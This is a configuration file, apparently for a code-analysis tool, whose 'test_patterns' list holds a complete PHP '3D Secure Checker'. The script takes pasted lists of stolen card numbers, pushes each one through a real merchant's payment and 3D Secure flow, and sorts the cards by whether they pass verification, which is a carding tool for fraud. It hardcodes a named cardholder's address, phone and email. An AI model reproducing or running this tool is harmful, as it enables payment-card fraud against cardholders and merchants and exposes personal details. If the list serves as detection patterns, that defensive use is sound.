version = 1

test_patterns = [
  "<?php",
  "function percent($num_amount, $num_total) {",
  "$count1 = $num_amount / $num_total; ",
  "$count2 = $count1 * 100; ",
  "$count = number_format($count2, 0); ",
  "return $count; ",
  "}",
  "function Random($x)",
  "{",
  "\t$Strings = \"abcdefghiklmnopqrstuvwxyz0123456789\";",
  "\t$Str = \"\";",
  "\twhile(strlen($Str) < $x)",
  "\t{",
  "\t\t$Rand = Rand(0,strlen($Strings));",
  "\t\t$Str .= substr($Strings,$Rand,1);",
  "\t}",
  "\treturn $Str;",
  "}",
  "function inStr($s,$as)",
  "{",
  "\t$s = strtoupper($s);",
  "\tif(!is_array($as)) $as=array($as);",
  "\tfor($i=0;$i<count($as);$i++) if(strpos(($s),strtoupper($as[$i]))!==false) return true;",
  "\treturn false;",
  "}",
  "class Curls",
  "{",
  "\tvar $Curl_Hand, $Agent, $TimeOut, $Socks, $Cookie, $Posts, $Referer, $HTTPHeader;",
  "\tfunction Clear()",
  "\t{",
  "\t\t$this->Agent\t=\t\"Mozilla/6.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3\";",
  "\t\t$this->TimeOut\t=\t15;",
  "\t\t$this->Socks\t=\tFalse;",
  "\t\t$this->Cookie\t=\tFalse;",
  "\t\t$this->Posts\t=\tFalse;",
  "\t\t$this->HTTPHeader\t=\tFalse;",
  "\t}",
  "\tfunction Init()\t",
  "\t{",
  "\t\t$this->Curl_Hand = curl_init();",
  "\t\treturn $this->Curl_Hand;",
  "\t}",
  "\tfunction SetTimeOut($TimeOut)",
  "\t{",
  "\t\t$this->TimeOut = $TimeOut;",
  "\t\treturn $this->TimeOut;",
  "\t}",
  "\tfunction SetHeader($Header)",
  "\t{",
  "\t\t$this->HTTPHeader = $Header;",
  "\t\treturn $this->HTTPHeader;",
  "\t}",
  "\tfunction SetSocks($Socks)",
  "\t{",
  "\t\t$this->Socks = $Socks;",
  "\t\treturn $this->Socks;",
  "\t}",
  "\tfunction SetCookie($Cookie)",
  "\t{",
  "\t\t$this->Cookie = $Cookie;",
  "\t\treturn $this->Cookie;",
  "\t}",
  "\tfunction SetReferer($Referer)",
  "\t{",
  "\t\t$this->Referer = $Referer;",
  "\t\treturn $this->Referer;",
  "\t}",
  "\tfunction SetPosts($Posts)",
  "\t{",
  "\t\t$this->Posts = $Posts;",
  "\t\treturn $this->Posts;",
  "\t}",
  "\tfunction SetOpt($Urls)",
  "\t{",
  "\t\tcurl_setopt($this->Curl_Hand, CURLOPT_URL, $Urls);",
  "\t\tcurl_setopt($this->Curl_Hand, CURLOPT_RETURNTRANSFER, TRUE);",
  "\t\tcurl_setopt($this->Curl_Hand, CURLOPT_HEADER, TRUE);",
  "\t\tcurl_setopt($this->Curl_Hand, CURLOPT_FOLLOWLOCATION, TRUE);",
  "\t\tcurl_setopt($this->Curl_Hand, CURLOPT_USERAGENT, $this->Agent);",
  "\t\tcurl_setopt($this->Curl_Hand, CURLOPT_SSL_VERIFYHOST, 1);",
  "\t\tcurl_setopt($this->Curl_Hand, CURLOPT_SSL_VERIFYPEER, FALSE);",
  "\t\tcurl_setopt($this->Curl_Hand, CURLOPT_TIMEOUT, $this->TimeOut);",
  "\t\tcurl_setopt($this->Curl_Hand, CURLOPT_CONNECTTIMEOUT, $this->TimeOut);",
  "\t\tcurl_setopt($this->Curl_Hand, CURLOPT_AUTOREFERER, TRUE); ",
  "\t\tif($this->Posts)",
  "\t\t{",
  "\t\t\tcurl_setopt($this->Curl_Hand, CURLOPT_POST, 1);",
  "\t\t\tcurl_setopt($this->Curl_Hand, CURLOPT_POSTFIELDS, $this->Posts);",
  "\t\t}",
  "\t\tif($this->Socks)",
  "\t\t{",
  "\t\t\tcurl_setopt($this->Curl_Hand, CURLOPT_PROXY, $this->Socks);",
  "\t\t\tcurl_setopt($this->Curl_Hand, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);",
  "\t\t}",
  "\t\tif($this->Cookie)",
  "\t\t{",
  "\t\t\tcurl_setopt($this->Curl_Hand, CURLOPT_COOKIEJAR, $this->Cookie);",
  "\t\t\tcurl_setopt($this->Curl_Hand, CURLOPT_COOKIEFILE, $this->Cookie);",
  "\t\t}",
  "\t\tif($this->Referer)",
  "\t\t{",
  "\t\t\tcurl_setopt($this->Curl_Hand, CURLOPT_REFERER, $this->Referer);",
  "\t\t}",
  "\t\tif($this->HTTPHeader)",
  "\t\t{",
  "\t\t\tcurl_setopt($this->Curl_Hand, CURLOPT_HTTPHEADER, $this->HTTPHeader);",
  "\t\t}",
  "\t\treturn $this->Curl_Hand;",
  "\t}",
  "\tfunction GetInfo()",
  "\t{",
  "\t\treturn curl_getinfo($this->Curl_Hand);",
  "\t}",
  "\tfunction Error()",
  "\t{",
  "\t\treturn curl_error($this->Curl_Hand);",
  "\t}",
  "\tfunction Exec()",
  "\t{",
  "\t\treturn curl_exec($this->Curl_Hand);",
  "\t}",
  "\tfunction Close_Exce()",
  "\t{",
  "\t\treturn curl_close ($this->Curl_Hand);",
  "\t}",
  "}",
  "function Hidden($html, $Name)",
  "{",
  "\tif(!preg_match('|<form[^>]+'.$Name.'[^>]+>.*</form>|Usi', $html, $form))",
  "\t{",
  "\t\treturn '';",
  "\t}",
  "\tif(!preg_match_all('/<input[^>]+hidden[^>]*>/i', $form[0], $inputs))",
  "\t{",
  "\t\treturn '';",
  "\t}",
  "\t$hiddenInputs = array();",
  "\tforeach($inputs[0] as $input)",
  "\t{",
  "\t\tif (preg_match('|name\\s*=\\s*[\\'\"]([^\\'\"]+)[\\'\"]|i', $input, $name))",
  "\t\t{",
  "\t\t\t$hiddenInputs[$name[1]] = '';",
  "\t\t\tif (preg_match('|value\\s*=\\s*[\\'\"]([^\\'\"]*)[\\'\"]|i', $input, $value))",
  "\t\t\t{",
  "\t\t\t\t$hiddenInputs[$name[1]] = $value[1];",
  "\t\t\t}",
  "\t\t}",
  "\t}",
  "\treturn $hiddenInputs;",
  "}",
  "function SentPosts($postFields)",
  "{",
  "\tforeach($postFields as $key => $value)",
  "\t{",
  "\t\t$value = urlencode($value);",
  "\t\t$postFields[$key] = \"$key=$value\";",
  "\t}",
  "\t$postFields = implode($postFields, '&');",
  "\treturn $postFields;",
  "}",
  "function check($cc)",
  "{",
  "\t$Cookie = tempnam('Cookie','3dsecure2-'.Random(rand(5,25)).'.txt');",
  "\tfclose(fopen($Cookie,'w'));",
  "\t$Curls = new Curls();",
  "\t$Curls->Init();",
  "\t$Curls->Clear();",
  "\t$Curls->SetCookie($Cookie);",
  "\t$Curls->SetOpt(\"https://secure.transecute.com/transecuteicici/icicicredit/payprocess.php3?toid=1167&totype=icicicredit&fromtype=transecute&amount=1.0&description=AddFund-R-329325-3139838&redirecturl=http%3A%2F%2Fmanage.resellerclub.com%2Fservlet%2FTransecuteAuthCompletedServlet&checksum=8479c566c428914961604ff725db080e&TMPL_RESELLERID=1&TMPL_AMOUNT=1.0&TMPL_CURRENCY=USD&orderdescription=null&TMPL_VERSION=2&TMPL_TABLEBG=&TMPL_LOGOHEIGHT=0\");",
  "\t$Results_1 = $Curls->Exec();",
  "\t$Data = Hidden($Results_1, \"post\");",
  "\t$Posts = SentPosts($Data);",
  "\t$Curls->SetPosts($Posts);",
  "\t$Curls->SetOpt(\"https://secure.transecute.com/icici/servlet/NewPaymentServlet\");",
  "\t$Results_2 = $Curls->Exec();",
  "\t$Data2 = Hidden($Results_2, \"mainForm\");",
  "\t$Data2['CARDHOLDER'] = \"Jessica Pishko\";",
  "\t$Data2['PAN'] = $cc['num'];",
  "\t$Data2['EXPIRE_MONTH'] = \"01\";",
  "\t$Data2['EXPIRE_YEAR'] = \"2015\";",
  "\t$Data2['ccid'] = \"312\";",
  "\t$Data2['street'] = \"273 E 10th St.\";",
  "\t$Data2['city'] = \"New York\";",
  "\t$Data2['state'] = \"NY\";",
  "\t$Data2['zip'] = \"10009\";",
  "\t$Data2['country'] = \"US\";",
  "\t$Data2['telnocc'] = \"001\";",
  "\t$Data2['telno'] = \"4152256092\";",
  "\t$Data2['emailaddr'] = \"vbv-transecute@mrami.vn\";",
  "\t$Posts2 = SentPosts($Data2);",
  "\t$Curls->SetPosts($Posts2);",
  "\t$Curls->SetOpt(\"https://secure.transecute.com/icici/servlet/PostPaymentServlet\");",
  "\t$Results_3 = $Curls->Exec();",
  "\t$Data3 = Hidden($Results_3, \"postpay\");",
  "\t$Posts3 = SentPosts($Data3);",
  "\t$Curls->SetPosts($Posts3);",
  "\t$Curls->SetOpt(\"https://3dsecure.payseal.com/MultiMPI/from_icici_merchant.jsp\");",
  "\t$Results_4 = $Curls->Exec();",
  "\tpreg_match_all('/<form method=\"post\" name=\"acsForm\" action=\"(.*?)\" >/is', $Results_4, $X_Url1);",
  "\t$Data4 = Hidden($Results_4, \"acsForm\");",
  "\t$Posts4 = SentPosts($Data4);",
  "\t$Curls->SetPosts($Posts4);",
  "\t$Curls->SetOpt($X_Url1[1][0]);",
  "\t$Results_5 = $Curls->Exec();",
  "\tif(inStr($Results_5, '<form method=\"post\" name=\"merForm\" action=\"https://secure.transecute.com/icici/servlet/PreWaitServlet\">'))  $End['results'] = 1;",
  "\telseif($cc['type'] == 5)",
  "\t{",
  "\t\tpreg_match_all('/<form method=\"post\" name=\"acsForm\" action=\"https:\\/\\/(.*?)\\//is', $Results_5, $X_x);",
  "\t\t$End['results'] = 2;",
  "\t\tif(!$X_x[1][0]) $End['site'] = \"Unknown\";",
  "\t\telse $End['site'] = $X_x[1][0];",
  "\t}",
  "\telse",
  "\t{",
  "\t\tpreg_match_all('/<form method=\"post\" name=\"acsForm\" action=\"(.*?)\">/is', $Results_5, $X_Url2);",
  "\t\t$Data5 = Hidden($Results_5, \"acsForm\");",
  "\t\t$Posts5 = SentPosts($Data5);",
  "\t\t$Curls->SetPosts($Posts5);",
  "\t\t$Curls->SetOpt($X_Url2[1][0]);",
  "\t\t$Results_6 = $Curls->Exec();",
  "\t\tif(inStr($Results_6, \"<title>VisaGold</title>\")) $End['results'] = 1;",
  "\t\telseif(inStr($Results_6, '<form name=\"downloadForm\" action=\"https://3dsecure.payseal.com/MultiMPI/MPIServer?perform=fromAcs\" method=post  >'))",
  "\t\t{",
  "\t\t\t$Data6 = Hidden($Results_6, \"downloadForm\");",
  "\t\t\t$Posts6 = SentPosts($Data6);",
  "\t\t\t$Curls->SetPosts($Posts6);\t",
  "\t\t\t$Curls->SetOpt(\"https://3dsecure.payseal.com/MultiMPI/MPIServer?perform=fromAcs\");",
  "\t\t\t$Results_7 = $Curls->Exec();",
  "\t\t\tif(inStr($Results_7, '<form method=\"post\" name=\"merForm\" action=\"https://secure.transecute.com/icici/servlet/PreWaitServlet\">')) $End['results'] = 1;",
  "\t\t\telse",
  "\t\t\t{",
  "\t\t\t\tpreg_match_all('/https:\\/\\/(.*?)\\//is', $Results_7, $X_3);",
  "\t\t\t\tif(!$X_3[1][0]) $End['site'] = \"Unknown\";",
  "\t\t\t\telse $End['site'] = $X_3[1][0];",
  "\t\t\t\t$End['results'] = 2;",
  "\t\t\t}",
  "\t\t}",
  "\t\telse",
  "\t\t{",
  "\t\t\tpreg_match_all('/https:\\/\\/(.*?)\\//is', $Results_6, $X_4);",
  "\t\t\tif(!$X_4[1][0]) $End['site'] = \"Unknown\";",
  "\t\t\telse $End['site'] = $X_4[1][0];",
  "\t\t\t$End['results'] = 2;",
  "\t\t}",
  "\t}",
  "\t$Curls->Close_Exce();",
  "\tunlink($Cookie);",
  "\tflush();",
  "\treturn $End;",
  "}",
  "function information($ccline){",
  "  $xy = array(\"|\",\"\\\\\",\"/\",\"-\",\";\");",
  "  $sepe = $xy[0];",
  "  foreach($xy as $v){",
  "      if (substr_count($ccline,$sepe) < substr_count($ccline,$v)) $sepe = $v;",
  "  }",
  "  $x = explode($sepe,$ccline);",
  "  foreach($xy as $y) $x = str_replace($y,\"\",str_replace(\" \",\"\",$x));",
  "  foreach ($x as $xx){",
  "      $xx = trim($xx);",
  "         if (is_numeric($xx)){",
  "             $yy=strlen($xx);",
  "             switch ($yy){",
  "                 case 16:",
  "                     switch (substr($xx,0,1)){",
  "                          case '4':",
  "                             $ccnum['num']=$xx;",
  "                             $ccnum['type'] = \"4\";",
  "                             break;",
  "                        case '5':",
  "                             $ccnum['num']=$xx;",
  "                             $ccnum['type'] = \"5\";",
  "                             break;",
  "                     }",
  "                     break;",
  "              }",
  "          }",
  "    }",
  "\treturn $ccnum;",
  "}",
  "function removedupe($cclist)",
  "{",
  "\t$cclist = explode(\"\\n\",$cclist);",
  "\t$New = array();",
  "\t$CheckMP = array();",
  "\tforeach($cclist as $ccline)",
  "\t{",
  "\t\t$cc = information($ccline);",
  "\t\t$CcNum = str_replace(array(\" \", \"-\"),\"\", $cc['num']);",
  "\t\tif(strlen($CcNum)==\"16\")",
  "\t\t{",
  "\t\t\tif(!isset($CheckMP[$CcNum]))",
  "\t\t\t{",
  "\t\t\t\t$CheckMP[$CcNum] = true;",
  "\t\t\t\t$New[] = $ccline;",
  "\t\t\t}",
  "\t\t}",
  "\t}",
  "\treturn $New;",
  "}",
  "if(@$_POST[\"cclist\"]){",
  "\t$cookie = tempnam('cookie/','vbv'.rand(1000000000,9999999999).'l1tb1234.txt'); ",
  "\t$cclist=split(\"\\n\",trim($_POST[\"cclist\"]));",
  "\t",
  "\techo \"<center><table class='datatable sortable full'><thead><tr><th align=center width=100>VBV ?</th><th align=center>Full Details</th></tr></thead>\";",
  "\t",
  "\tfor($i=0;$i<count($cclist);$i++){",
  "\t\t$cc = information($cclist[$i]);",
  "\t\t$r = str_pad($i, strlen(count($cclist)), \"0\", STR_PAD_LEFT);",
  "\t\t",
  "\t\tif($cc){",
  "\t\t\t$Results = check($cc);",
  "\t\t\tflush();",
  "\t\t\tif($cc['type'] == 4) $Type = \"VBV\";",
  "\t\t\telseif($cc['type'] == 5) $Type = \"MCSC\";",
  "\t\t\tif($Results['results'] == 1)",
  "\t\t\t{",
  "\t\t\t\t$r++;",
  "\t\t\t\techo \"<tr><td align=center ><font color=green><b>Pass</b></font></td><td><font color=black>\".$cclist[$i].\"</font></td></tr>\"; ",
  "\t\t\t\t$vbv .= $cclist[$i].\"\\n\";",
  "\t\t\t}",
  "\t\t\telseif($Results['results'] == 2)",
  "\t\t\t{",
  "\t\t\t\t$r++;",
  "\t\t\t\t\techo \"<tr><td align=center ><font color=red><b>No Pass</b></font></td><td><font color=blue>[ \".$Results['site'].\" ]</font> <font color=black>\".$cclist[$i].\"</font></td></tr>\"; ",
  "\t\t\t\t\t$novbv .= $cclist[$i].\"\\n\";",
  "\t\t\t}",
  "\t\t\telse",
  "\t\t\t{",
  "\t\t\t\t$r++;",
  "\t\t\t\techo \"<tr><td align=center><font color=purple><b>Invalid</b></font></td><td><font color=black>\".$cclist[$i].\"</font></td></tr>\"; ",
  "\t\t\t\t$invalid .= $cclist[$i].\"\\n\";",
  "\t\t\t}",
  "\t\t}",
  "\t}",
  "\tunlink($cookie);",
  "\techo \"</table><br>\";",
  "\t$per1 = percent(count(explode(\"\\n\",$vbv))-1,count($cclist));",
  "\t$per2 = percent(count(explode(\"\\n\",$novbv))-1,count($cclist));",
  "\t$per3 = percent(count(explode(\"\\n\",$invalid))-1,count($cclist));",
  "\t",
  "\tif($vbv!=\"\"){",
  "\t\techo \"<h2><font color=blue>PASS</font> $per1 % (\".(count(explode(\"\\n\",$vbv))-1).\"/\".count($cclist).\")</h2>\";",
  "\t\techo \"<textarea style='width:90%' rows=7>$vbv</textarea><br>\";",
  "\t}",
  "\tif($novbv!=\"\"){",
  "\t\techo \"<h2><font color=red>NO PASS</font> $per2 % (\".(count(explode(\"\\n\",$novbv))-1).\"/\".count($cclist).\")</h2>\";",
  "\t\techo \"<textarea style='width:90%' rows=7>$novbv</textarea><br>\";",
  "\t}",
  "\tif($invalid!=\"\"){",
  "\t\techo \"<h2><font color=purple>INVALID</font> $per3 % (\".(count(explode(\"\\n\",$invalid))-1).\"/\".count($cclist).\")</h2>\";",
  "\t\techo \"<textarea style='width:90%' rows=7>$invalid</textarea><br>\";",
  "\t}",
  "}",
  "else{?>",
  "<center><h1>3D Secure Checker</h1>",
  "Auto Check VBV/MCSC (3DSecure) by CCNumber !!!<br>",
  "<form action=\"\" name=f method=\"post\">",
  "      <textarea name=\"cclist\" style=\"width:90%\" rows=\"10\" id=\"cclist\"></textarea>",
  "         <pre> <input type=\"submit\" name=\"Submit\" class='button button-gray' value=\"Check Now\" /></pre>",
  "    </form>",
  "<?php",
  "}"
]

[[analyzers]]
name = "test-coverage"
enabled = true

[[analyzers]]
name = "javascript"
enabled = true

  [analyzers.meta]
  plugins = [
    "react",
    "ember"
  ]